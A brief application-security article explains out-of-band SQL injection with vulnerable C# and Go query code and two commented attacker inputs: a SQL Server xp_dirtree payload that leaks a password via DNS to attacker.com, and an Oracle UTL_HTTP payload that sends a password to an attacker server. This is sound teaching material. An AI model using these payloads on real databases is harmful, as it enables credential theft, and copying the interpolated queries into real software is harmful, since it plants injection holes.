Out-of-Band SQL Injection

1 min read Application Security

Out-of-Band SQL Injection

Out-of-band injection uses different channels for attack and data retrieval, typically exploiting database features that make external network connections. DNS exfiltration example:

// Vulnerable C# code
string userId = Request.QueryString["id"];
string query = $"SELECT * FROM users WHERE id = {userId}";

// Attacker input on SQL Server:
// 1; EXEC('xp_dirtree ''\\\\' + (SELECT password FROM users WHERE id=1) + '.attacker.com\\share''')--
// Password is exfiltrated via DNS lookup to attacker-controlled domain

HTTP request exfiltration:

// Vulnerable Go code
userInput := r.URL.Query().Get("search")
query := fmt.Sprintf("SELECT * FROM products WHERE name LIKE '%%%s%%'", userInput)

// Attacker input on Oracle:
// %' || UTL_HTTP.request('http://attacker.com/'||(SELECT password FROM users WHERE rownum=1))--
// Sensitive data sent to attacker's server